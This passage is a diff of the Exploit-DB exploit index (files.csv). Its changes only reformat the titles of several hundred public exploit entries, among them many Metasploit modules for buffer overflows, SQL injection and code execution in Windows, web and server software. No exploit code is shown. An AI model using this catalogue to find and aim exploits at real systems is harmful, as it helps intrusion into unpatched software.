16230,platforms/windows/dos/16230.py,"Victory FTP Server 5.0 - Denial of Service Exploit",2011-02-24,"C4SS!0 G0M3S",windows,dos,0 16231,platforms/ios/remote/16231.txt,"iOS Share 1.0 - Directory Traversal",2011-02-24,"R3d@l3rt, Sp@2K, Sunlight",ios,remote,0 -16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 -16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 +16232,platforms/php/webapps/16232.txt,"GigPress 2.1.10 Wordpress Plugin - Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 +16233,platforms/php/webapps/16233.txt,"Relevanssi 2.7.2 Wordpress Plugin - Stored XSS Vulnerability",2011-02-24,"Saif El-Sherei",php,webapps,0 16234,platforms/netware/dos/16234.rb,"Novell Netware RPC XNFS xdrDecodeString Vulnerability",2011-02-24,"Francis Provencher",netware,dos,0 16235,platforms/php/webapps/16235.txt,"Wordpress Plugin Forum Server 1.6.5 - SQL Injection Vulnerability",2011-02-24,"High-Tech Bridge SA",php,webapps,0 -16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 +16236,platforms/php/webapps/16236.txt,"IWantOneButton 3.0.1 Wordpress Plugin - Multiple Vulnerabilities",2011-02-24,"High-Tech Bridge SA",php,webapps,0 16237,platforms/windows/dos/16237.py,"Elecard MPEG Player 5.7 - Local Buffer Overflow PoC (SEH)",2011-02-24,badc0re,windows,dos,0 16238,platforms/hardware/remote/16238.txt,"iphone ishred 1.93 - Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 16239,platforms/hardware/remote/16239.txt,"iPhone Guitar Directory Traversal",2011-02-24,IRCRASH,hardware,remote,0 @@ -14059,8 +14059,8 @@ id,file,description,date,author,platform,type,port 16247,platforms/php/webapps/16247.txt,"Pragyan CMS 3.0 - Multiple Vulnerabilities",2011-02-25,"Villy and Abhishek Lyall",php,webapps,0 16248,platforms/windows/dos/16248.pl,"eXPert PDF Reader 4.0 NULL Pointer Dereference and Heap Corruption",2011-02-26,LiquidWorm,windows,dos,0 16249,platforms/php/webapps/16249.txt,"phreebooks r30rc4 - Multiple Vulnerabilities",2011-02-26,"AutoSec Tools",php,webapps,0 -16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 -16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin LFI Vulnerability",2011-02-26,"AutoSec Tools",php,webapps,0 +16250,platforms/php/webapps/16250.txt,"jQuery Mega Menu 1.0 Wordpress Plugin - Local File Inclusion",2011-02-26,"AutoSec Tools",php,webapps,0 +16251,platforms/php/webapps/16251.txt,"OPS Old Post Spinner 2.2.1 Wordpress Plugin - LFI Vulnerability",2011-02-26,"AutoSec Tools",php,webapps,0 16252,platforms/hardware/webapps/16252.html,"Linksys Cisco WAG120N CSRF Vulnerability",2011-02-26,IRCRASH,hardware,webapps,0 16255,platforms/windows/dos/16255.pl,"Magic Music Editor - (.cda) Denial of Service",2011-02-28,"AtT4CKxT3rR0r1ST ",windows,dos,0 16256,platforms/php/webapps/16256.txt,"DO-CMS - Multiple SQL Injection Vulnerabilities",2011-02-28,"AtT4CKxT3rR0r1ST ",php,webapps,0 @@ -14121,7 +14121,7 @@ id,file,description,date,author,platform,type,port 16317,platforms/multiple/remote/16317.rb,"Apache Tomcat Manager Application Deployer Authenticated Code Execution",2010-12-14,metasploit,multiple,remote,0 16318,platforms/multiple/remote/16318.rb,"JBoss JMX Console Deployer Upload and Execute",2010-10-19,metasploit,multiple,remote,0 16319,platforms/multiple/remote/16319.rb,"JBoss JMX Console Beanshell Deployer WAR upload and deployment",2011-01-10,metasploit,multiple,remote,0 -16320,platforms/unix/remote/16320.rb,"Samba ""username map script"" Command Execution",2010-08-18,metasploit,unix,remote,0 +16320,platforms/unix/remote/16320.rb,"Samba _username map script_ Command Execution",2010-08-18,metasploit,unix,remote,0 16321,platforms/linux/remote/16321.rb,"Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow",2010-04-28,metasploit,linux,remote,0 16322,platforms/solaris/remote/16322.rb,"Solaris LPD Command Execution",2010-09-20,metasploit,solaris,remote,0 16323,platforms/solaris_sparc/remote/16323.rb,"Solaris dtspcd Heap Overflow",2010-04-30,metasploit,solaris_sparc,remote,0 @@ -14150,7 +14150,7 @@ id,file,description,date,author,platform,type,port 16346,platforms/windows/remote/16346.rb,"TFTPDWIN 0.4.2 - Long Filename Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16347,platforms/windows/remote/16347.rb,"3CTftpSvc TFTP - Long Mode Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16348,platforms/windows/remote/16348.rb,"Quick FTP Pro 2.1 Transfer-Mode Overflow",2010-06-15,metasploit,windows,remote,0 -16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21- Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16349,platforms/windows/remote/16349.rb,"TFTPD32 <= 2.21 - Long Filename Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16350,platforms/windows/remote/16350.rb,"Allied Telesyn TFTP Server 1.9 - Long Filename Overflow",2011-03-05,metasploit,windows,remote,0 16351,platforms/windows/remote/16351.rb,"SIPfoundry sipXezPhone 0.35a CSeq Field Overflow",2010-06-15,metasploit,windows,remote,0 16352,platforms/windows/remote/16352.rb,"SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow",2010-06-15,metasploit,windows,remote,0 @@ -14295,19 +14295,19 @@ id,file,description,date,author,platform,type,port 16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0 16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0 16493,platforms/windows/remote/16493.rb,"EnjoySAP SAP GUI ActiveX Control Arbitrary File Download",2010-12-01,metasploit,windows,remote,0 -16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 +16494,platforms/windows/remote/16494.rb,"Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16495,platforms/multiple/remote/16495.rb,"Sun Java Web Start BasicServiceImpl Remote Code Execution Exploit",2011-01-22,metasploit,multiple,remote,0 16496,platforms/windows/remote/16496.rb,"Kazaa Altnet Download Manager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16497,platforms/windows/remote/16497.rb,"RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16498,platforms/windows/remote/16498.rb,"EnjoySAP SAP GUI ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16499,platforms/windows/remote/16499.rb,"Internet Explorer Unsafe Scripting Misconfiguration",2010-09-20,metasploit,windows,remote,0 +16499,platforms/windows/remote/16499.rb,"Microsoft Internet Explorer - Unsafe Scripting Misconfiguration",2010-09-20,metasploit,windows,remote,0 16500,platforms/windows/remote/16500.rb,"Hyleos ChemView ActiveX Control Stack Buffer Overflow",2010-07-27,metasploit,windows,remote,0 16501,platforms/windows/remote/16501.rb,"Novell iPrint Client ActiveX Control call-back-url Buffer Overflow",2010-09-21,metasploit,windows,remote,0 16502,platforms/windows/remote/16502.rb,"IBM Lotus Domino Web Access Upload Module Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16503,platforms/windows/local/16503.rb,"Adobe Doc.media.newPlayer Use After Free Vulnerability",2010-04-30,metasploit,windows,local,0 16504,platforms/windows/local/16504.rb,"Adobe util.printf() Buffer Overflow",2010-05-03,metasploit,windows,local,0 16505,platforms/windows/remote/16505.rb,"Facebook Photo Uploader 4 - ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16506,platforms/windows/remote/16506.rb,"Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",2010-07-16,metasploit,windows,remote,0 +16506,platforms/windows/remote/16506.rb,"Microsoft Internet Explorer - Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability",2010-07-16,metasploit,windows,remote,0 16507,platforms/windows/remote/16507.rb,"Microsoft Visual Studio - Msmask32.ocx ActiveX Buffer Overflow",2010-11-24,metasploit,windows,remote,0 16508,platforms/windows/remote/16508.rb,"Novell iPrint Client ActiveX Control Buffer Overflow",2008-06-16,metasploit,windows,remote,0 16509,platforms/windows/remote/16509.rb,"Mozilla Firefox Interleaving document.write and appendChild Exploit",2011-02-22,metasploit,windows,remote,0 @@ -14333,8 +14333,8 @@ id,file,description,date,author,platform,type,port 16529,platforms/windows/remote/16529.rb,"WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16530,platforms/windows/remote/16530.rb,"mIRC IRC URL Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16531,platforms/windows/local/16531.rb,"Winamp Playlist UNC Path Computer Name Overflow",2010-04-30,metasploit,windows,local,0 -16532,platforms/windows/remote/16532.rb,"Internet Explorer XML Core Services HTTP Request Handling",2010-07-03,metasploit,windows,remote,0 -16533,platforms/windows/remote/16533.rb,"Internet Explorer CSS Recursive Import Use After Free",2011-02-08,metasploit,windows,remote,0 +16532,platforms/windows/remote/16532.rb,"Microsoft Internet Explorer - XML Core Services HTTP Request Handling",2010-07-03,metasploit,windows,remote,0 +16533,platforms/windows/remote/16533.rb,"Microsoft Internet Explorer - CSS Recursive Import Use After Free",2011-02-08,metasploit,windows,remote,0 16534,platforms/windows/remote/16534.rb,"AtHocGov IWSAlerts ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 16535,platforms/windows/remote/16535.rb,"Trend Micro OfficeScan Client ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16536,platforms/windows/remote/16536.rb,"Green Dam URL Processing Buffer Overflow",2010-03-10,metasploit,windows,remote,0 @@ -14342,33 +14342,33 @@ id,file,description,date,author,platform,type,port 16538,platforms/windows/remote/16538.rb,"McAfee Visual Trace ActiveX Control Buffer Overflow",2010-09-20,metasploit,windows,remote,0 16539,platforms/windows/remote/16539.rb,"Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16540,platforms/windows/remote/16540.rb,"Zenturi ProgramChecker ActiveX Control Arbitrary File Download",2010-11-24,metasploit,windows,remote,0 -16541,platforms/windows/remote/16541.rb,"Internet Explorer Winhlp32.exe MsgBox Code Execution",2010-09-28,metasploit,windows,remote,0 +16541,platforms/windows/remote/16541.rb,"Microsoft Internet Explorer - Winhlp32.exe MsgBox Code Execution",2010-09-28,metasploit,windows,remote,0 16542,platforms/windows/webapps/16542.rb,"Microsoft OWC Spreadsheet HTMLURL Buffer Overflow",2010-04-30,metasploit,windows,webapps,0 16543,platforms/windows/remote/16543.rb,"Novell iPrint Client ActiveX Control Date/Time Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16544,platforms/windows/remote/16544.rb,"SonicWALL Aventail epi.dll AuthCredential Format String Exploit",2010-09-20,metasploit,windows,remote,0 16545,platforms/windows/remote/16545.rb,"Microsoft Help Center XSS and Command Execution",2010-09-20,metasploit,windows,remote,0 16546,platforms/windows/local/16546.rb,"Adobe FlateDecode Stream Predictor 02 Integer Overflow",2010-09-20,metasploit,windows,local,0 -16547,platforms/windows/remote/16547.rb,"Internet Explorer Style getElementsByTagName Memory Corruption",2010-07-12,metasploit,windows,remote,0 +16547,platforms/windows/remote/16547.rb,"Microsoft Internet Explorer - Style getElementsByTagName Memory Corruption",2010-07-12,metasploit,windows,remote,0 16548,platforms/windows/remote/16548.rb,"Amaya Browser 11.0 - bdo tag Overflow",2010-05-09,metasploit,windows,remote,0 -16549,platforms/windows/remote/16549.rb,"Internet Explorer isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 +16549,platforms/windows/remote/16549.rb,"Microsoft Internet Explorer - isComponentInstalled Overflow",2010-05-09,metasploit,windows,remote,0 16550,platforms/windows/remote/16550.rb,"WebDAV - Application DLL Hijacker",2010-09-24,metasploit,windows,remote,0 -16551,platforms/windows/remote/16551.rb,"Internet Explorer CSS SetUserClip Memory Corruption",2011-01-20,metasploit,windows,remote,0 +16551,platforms/windows/remote/16551.rb,"Microsoft Internet Explorer - CSS SetUserClip Memory Corruption",2011-01-20,metasploit,windows,remote,0 16552,platforms/windows/remote/16552.rb,"Husdawg_ LLC. System Requirements Lab ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 16553,platforms/windows/remote/16553.rb,"BaoFeng Storm mps.dll ActiveX OnBeforeVideoDownload Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16554,platforms/windows/remote/16554.rb,"America Online ICQ ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 -16555,platforms/windows/remote/16555.rb,"Internet Explorer 7 CFunctionPointer Uninitialized Memory Corruption",2010-07-12,metasploit,windows,remote,0 +16555,platforms/windows/remote/16555.rb,"Microsoft Internet Explorer 7 - CFunctionPointer Uninitialized Memory Corruption",2010-07-12,metasploit,windows,remote,0 16556,platforms/windows/local/16556.rb,"XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",2010-05-09,metasploit,windows,local,0 16557,platforms/windows/remote/16557.rb,"Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16558,platforms/windows/remote/16558.rb,"Apple QuickTime 7.6.6 Invalid SMIL URI Buffer Overflow",2011-01-08,metasploit,windows,remote,0 16559,platforms/windows/remote/16559.rb,"Roxio CinePlayer ActiveX Control Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16560,platforms/windows/remote/16560.rb,"Autodesk IDrop ActiveX Control Heap Memory Corruption",2010-04-30,metasploit,windows,remote,0 -16561,platforms/windows/remote/16561.rb,"Internet Explorer COM CreateObject Code Execution",2010-09-20,metasploit,windows,remote,0 +16561,platforms/windows/remote/16561.rb,"Microsoft Internet Explorer - COM CreateObject Code Execution",2010-09-20,metasploit,windows,remote,0 16562,platforms/windows/local/16562.rb,"Apple ITunes 4.7 Playlist Buffer Overflow",2010-05-09,metasploit,windows,local,0 16563,platforms/windows/remote/16563.rb,"Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16564,platforms/windows/remote/16564.rb,"Internet Explorer WebViewFolderIcon setSlice() Overflow",2010-07-03,metasploit,windows,remote,0 +16564,platforms/windows/remote/16564.rb,"Microsoft Internet Explorer - WebViewFolderIcon setSlice() Overflow",2010-07-03,metasploit,windows,remote,0 16565,platforms/windows/remote/16565.rb,"RKD Software BarCodeAx.dll 4.9 - ActiveX Remote Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16566,platforms/windows/remote/16566.rb,"CommuniCrypt Mail 1.16 - SMTP ActiveX Stack Buffer Overflow",2010-07-26,metasploit,windows,remote,0 -16567,platforms/windows/remote/16567.rb,"Internet Explorer Tabular Data Control ActiveX Memory Corruption",2010-04-30,metasploit,windows,remote,0 +16567,platforms/windows/remote/16567.rb,"Microsoft Internet Explorer - Tabular Data Control ActiveX Memory Corruption",2010-04-30,metasploit,windows,remote,0 16568,platforms/windows/remote/16568.rb,"Juniper SSL-VPN IVE JuniperSetupDLL.dll ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16569,platforms/windows/remote/16569.rb,"Orbit Downloader Connecting Log Creation Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16570,platforms/windows/remote/16570.rb,"AwingSoft Winds3D Player 3.5 SceneURL Download and Execute",2010-09-20,metasploit,windows,remote,0 @@ -14379,28 +14379,28 @@ id,file,description,date,author,platform,type,port 16575,platforms/windows/remote/16575.rb,"SAP AG SAPgui EAI WebViewer3D Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16576,platforms/windows/remote/16576.rb,"Persits XUpload ActiveX AddFile Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16577,platforms/windows/remote/16577.rb,"CA BrightStor ARCserve Backup AddColumn() ActiveX Buffer Overflow",2010-06-15,metasploit,windows,remote,0 -16578,platforms/windows/remote/16578.rb,"Internet Explorer createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0 +16578,platforms/windows/remote/16578.rb,"Microsoft Internet Explorer - createTextRange() Code Execution",2010-09-20,metasploit,windows,remote,0 16579,platforms/windows/remote/16579.rb,"Oracle Document Capture 10g ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16580,platforms/windows/remote/16580.rb,"HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow",2010-04-30,metasploit,windows,remote,0 -16581,platforms/windows/remote/16581.rb,"Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0 +16581,platforms/windows/remote/16581.rb,"Microsoft Internet Explorer - Object Type (MS03-020)",2010-08-25,metasploit,windows,remote,0 16582,platforms/windows/remote/16582.rb,"Symantec BackupExec Calendar Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 -16583,platforms/windows/remote/16583.rb,"Internet Explorer Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0 +16583,platforms/windows/remote/16583.rb,"Microsoft Internet Explorer - Data Binding Memory Corruption",2010-09-20,metasploit,windows,remote,0 16584,platforms/windows/remote/16584.rb,"RealPlayer rmoc3260.dll ActiveX Control Heap Corruption",2010-06-15,metasploit,windows,remote,0 16585,platforms/windows/remote/16585.rb,"Sun Java Web Start Plugin Command Line Argument Injection",2010-09-21,metasploit,windows,remote,0 16586,platforms/windows/remote/16586.rb,"RealNetworks RealPlayer SMIL Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16587,platforms/windows/remote/16587.rb,"Sun Java Runtime New Plugin docbase Buffer Overflow",2011-01-08,metasploit,windows,remote,0 16588,platforms/windows/remote/16588.rb,"HP LoadRunner 9.0 - ActiveX AddFolder Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16589,platforms/windows/local/16589.rb,"Apple QuickTime 7.6.7 _Marshaled_pUnk Code Execution",2011-01-08,metasploit,windows,local,0 -16590,platforms/windows/remote/16590.rb,"Internet Explorer DHTML Behaviors Use After Free",2010-12-14,metasploit,windows,remote,0 +16590,platforms/windows/remote/16590.rb,"Microsoft Internet Explorer - DHTML Behaviors Use After Free",2010-12-14,metasploit,windows,remote,0 16591,platforms/windows/remote/16591.rb,"AOL Radio AmpX - ActiveX Control ConvertFile() Buffer Overflow",2010-04-30,metasploit,windows,remote,0 16592,platforms/windows/remote/16592.rb,"SoftArtisans XFile FileManager ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16593,platforms/windows/local/16593.rb,"Adobe - JBIG2Decode Memory Corruption Exploit",2010-06-15,metasploit,windows,local,0 16594,platforms/windows/remote/16594.rb,"Adobe Shockwave - rcsL Memory Corruption",2010-10-22,metasploit,windows,remote,0 16595,platforms/windows/remote/16595.rb,"Norton AntiSpam 2004 SymSpamHelper ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16596,platforms/windows/remote/16596.rb,"Trend Micro Internet Security Pro 2010 - ActiveX extSetOwner() Remote Code Execution",2010-10-04,metasploit,windows,remote,0 -16597,platforms/windows/remote/16597.rb,"Internet Explorer VML Fill Method Code Execution",2010-07-03,metasploit,windows,remote,0 +16597,platforms/windows/remote/16597.rb,"Microsoft Internet Explorer - VML Fill Method Code Execution",2010-07-03,metasploit,windows,remote,0 16598,platforms/windows/remote/16598.rb,"Persits XUpload ActiveX MakeHttpRequest Directory Traversal",2010-11-11,metasploit,windows,remote,0 -16599,platforms/windows/remote/16599.rb,"Internet Explorer ""Aurora"" Memory Corruption",2010-07-12,metasploit,windows,remote,0 +16599,platforms/windows/remote/16599.rb,"Microsoft Internet Explorer - _Aurora_ Memory Corruption",2010-07-12,metasploit,windows,remote,0 16600,platforms/windows/remote/16600.rb,"Symantec Altiris Deployment Solution ActiveX Control Arbitrary File Download and Execute",2010-11-24,metasploit,windows,remote,0 16601,platforms/windows/remote/16601.rb,"FlipViewer FViewerLoading ActiveX Control Buffer Overflow",2010-06-15,metasploit,windows,remote,0 16602,platforms/windows/remote/16602.rb,"Macrovision InstallShield Update Service ActiveX Unsafe Method",2010-09-20,metasploit,windows,remote,0 @@ -14415,12 +14415,12 @@ id,file,description,date,author,platform,type,port 16611,platforms/windows/remote/16611.rb,"Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16612,platforms/windows/remote/16612.rb,"Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution",2010-09-20,metasploit,windows,remote,0 16613,platforms/windows/remote/16613.rb,"Symantec ConsoleUtilities ActiveX Control Buffer Overflow",2010-11-11,metasploit,windows,remote,0 -16614,platforms/windows/local/16614.rb,"Adobe Flash Player ""newfunction"" Invalid Pointer Use",2010-09-20,metasploit,windows,local,0 +16614,platforms/windows/local/16614.rb,"Adobe Flash Player _newfunction_ Invalid Pointer Use",2010-09-20,metasploit,windows,local,0 16615,platforms/windows/local/16615.rb,"Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption",2010-04-30,metasploit,windows,local,0 16616,platforms/windows/remote/16616.rb,"SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow",2010-05-09,metasploit,windows,remote,0 16617,platforms/windows/local/16617.rb,"VUPlayer - M3U Buffer Overflow",2010-11-11,metasploit,windows,local,0 16618,platforms/windows/local/16618.rb,"BlazeDVD 5.1 PLF Buffer Overflow",2010-11-11,metasploit,windows,local,0 -16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table ""uniqueName"" Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 +16619,platforms/windows/local/16619.rb,"Adobe CoolType SING Table _uniqueName_ Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16620,platforms/windows/local/16620.rb,"Media Jukebox 8.0.400 - Buffer Overflow Exploit (SEH)",2011-01-08,metasploit,windows,local,0 16621,platforms/windows/local/16621.rb,"Foxit PDF Reader 4.1.1 - Title Stack Buffer Overflow",2010-12-16,metasploit,windows,local,0 16622,platforms/windows/local/16622.rb,"Adobe U3D CLODProgressiveMeshDeclaration Array Overrun",2010-09-25,metasploit,windows,local,0 @@ -14468,7 +14468,7 @@ id,file,description,date,author,platform,type,port 16664,platforms/windows/local/16664.rb,"gAlan 0.2.1 - Buffer Overflow Exploit",2010-09-25,metasploit,windows,local,0 16665,platforms/windows/local/16665.rb,"Microsoft PowerPoint Viewer TextBytesAtom Stack Buffer Overflow",2010-09-25,metasploit,windows,local,0 16666,platforms/windows/local/16666.rb,"UltraISO CCD File Parsing Buffer Overflow",2010-04-30,metasploit,windows,local,0 -16667,platforms/windows/local/16667.rb,"Adobe Flash Player ""Button"" Remote Code Execution",2010-11-01,metasploit,windows,local,0 +16667,platforms/windows/local/16667.rb,"Adobe Flash Player _Button_ Remote Code Execution",2010-11-01,metasploit,windows,local,0 16668,platforms/windows/local/16668.rb,"BACnet OPC Client Buffer Overflow",2010-11-14,metasploit,windows,local,0 16669,platforms/windows/local/16669.rb,"Adobe Illustrator CS4 14.0.0 - Postscript (.eps) Buffer Overflow",2010-09-25,metasploit,windows,local,0 16670,platforms/windows/local/16670.rb,"Adobe Acrobat Bundled LibTIFF Integer Overflow",2010-09-25,metasploit,windows,local,0 @@ -14488,13 +14488,13 @@ id,file,description,date,author,platform,type,port 16684,platforms/windows/local/16684.rb,"Destiny Media Player 1.61 - PLS .M3U Buffer Overflow",2010-04-30,metasploit,windows,local,0 16685,platforms/windows/remote/16685.rb,"MOXA MediaDBPlayback ActiveX Control Buffer Overflow",2010-11-05,metasploit,windows,remote,0 16686,platforms/windows/local/16686.rb,"Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)",2011-03-04,metasploit,windows,local,0 -16687,platforms/windows/local/16687.rb,"Adobe Flash Player ""newfunction"" Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 +16687,platforms/windows/local/16687.rb,"Adobe Flash Player _newfunction_ Invalid Pointer Use",2010-09-25,metasploit,windows,local,0 16688,platforms/windows/local/16688.rb,"Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow",2010-11-24,metasploit,windows,local,0 16689,platforms/windows/remote/16689.rb,"CCProxy <= 6.2 - Telnet Proxy Ping Overflow",2010-04-30,metasploit,windows,remote,23 16690,platforms/windows/remote/16690.rb,"Qbik WinGate WWW Proxy Server URL Processing Overflow",2010-09-20,metasploit,windows,remote,80 16691,platforms/windows/remote/16691.rb,"Blue Coat WinProxy Host Header Overflow",2010-07-12,metasploit,windows,remote,80 16692,platforms/windows/remote/16692.rb,"Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow",2010-09-20,metasploit,windows,remote,3128 -16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - ""secure"" Overflow (Win32)",2010-09-20,metasploit,windows,remote,7787 +16693,platforms/windows/remote/16693.rb,"Unreal Tournament 2004 - _secure_ Overflow (Win32)",2010-09-20,metasploit,windows,remote,7787 16694,platforms/windows/remote/16694.rb,"Racer 0.5.3 beta 5 - Buffer Overflow",2010-09-20,metasploit,windows,remote,26000 16695,platforms/windows/remote/16695.rb,"Medal Of Honor Allied Assault getinfo Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,12203 16696,platforms/windows/remote/16696.rb,"IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow",2010-05-09,metasploit,windows,remote,1533 @@ -14649,7 +14649,7 @@ id,file,description,date,author,platform,type,port 16845,platforms/linux/remote/16845.rb,"Poptop Negative Read Overflow",2010-11-23,metasploit,linux,remote,0 16846,platforms/linux/remote/16846.rb,"UoW IMAP server LSUB Buffer Overflow",2010-03-26,metasploit,linux,remote,0 16847,platforms/linux/remote/16847.rb,"Squid NTLM Authenticate Overflow",2010-04-30,metasploit,linux,remote,0 -16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - ""secure"" Overflow (Linux)",2010-09-20,metasploit,linux,remote,0 +16848,platforms/linux/remote/16848.rb,"Unreal Tournament 2004 - _secure_ Overflow (Linux)",2010-09-20,metasploit,linux,remote,0 16849,platforms/linux/remote/16849.rb,"MySQL yaSSL SSL Hello Message Buffer Overflow",2010-05-09,metasploit,linux,remote,0 16850,platforms/linux/remote/16850.rb,"MySQL yaSSL CertDecoder::GetName Buffer Overflow",2010-04-30,metasploit,linux,remote,0 16851,platforms/linux/remote/16851.rb,"ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)",2011-01-09,metasploit,linux,remote,0 @@ -14695,7 +14695,7 @@ id,file,description,date,author,platform,type,port 16892,platforms/php/webapps/16892.rb,"TWiki History TWikiUsers rev Parameter Command Execution",2010-07-03,metasploit,php,webapps,0 16893,platforms/cgi/webapps/16893.rb,"Barracuda IMG.PL Remote Command Execution",2010-04-30,metasploit,cgi,webapps,0 16894,platforms/php/webapps/16894.rb,"TWiki Search Function Arbitrary Command Execution",2010-07-03,metasploit,php,webapps,0 -16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 +16895,platforms/php/webapps/16895.rb,"WordPress cache_lastpostdate - Arbitrary Code Execution",2010-07-03,metasploit,php,webapps,0 16896,platforms/php/webapps/16896.rb,"vBulletin misc.php Template Name Arbitrary Code Execution",2010-07-25,metasploit,php,webapps,0 16897,platforms/php/webapps/16897.rb,"BASE base_qry_common Remote File Include",2010-11-24,metasploit,php,webapps,0 16899,platforms/php/webapps/16899.rb,"osCommerce 2.2 - Arbitrary PHP Code Execution",2010-07-03,metasploit,php,webapps,0 @@ -14744,7 +14744,7 @@ id,file,description,date,author,platform,type,port 16943,platforms/windows/dos/16943.pl,"Movavi VideoSuite 8.0 SlideShow jpg Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16944,platforms/windows/dos/16944.pl,"Movavi VideoSuite 8.0 Movie Editor avi Local Crash PoC",2011-03-08,KedAns-Dz,windows,dos,0 16945,platforms/hardware/dos/16945.pl,"Nokia N97 m3u Playlist Crash PoC",2011-03-08,KedAns-Dz,hardware,dos,0 -16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 +16947,platforms/php/webapps/16947.txt,"GRAND Flash Album Gallery 0.55 Wordpress Plugin - Multiple Vulnerabilities",2011-03-08,"High-Tech Bridge SA",php,webapps,0 16948,platforms/php/webapps/16948.txt,"Esselbach Storyteller CMS System 1.8 - SQL Injection Vulnerability",2011-03-09,Shamus,php,webapps,0 16949,platforms/php/webapps/16949.php,"maian weblog <= 4.0 - Remote Blind SQL Injection",2011-03-09,mr_me,php,webapps,0 16950,platforms/php/webapps/16950.txt,"recordpress 0.3.1 - Multiple Vulnerabilities",2011-03-09,IRCRASH,php,webapps,0 @@ -14843,7 +14843,7 @@ id,file,description,date,author,platform,type,port 17053,platforms/windows/remote/17053.txt,"wodWebServer.NET 1.3.3 - Directory Traversal",2011-03-27,"AutoSec Tools",windows,remote,0 17054,platforms/php/webapps/17054.txt,"webedition CMS 6.1.0.2 - Multiple Vulnerabilities",2011-03-27,"AutoSec 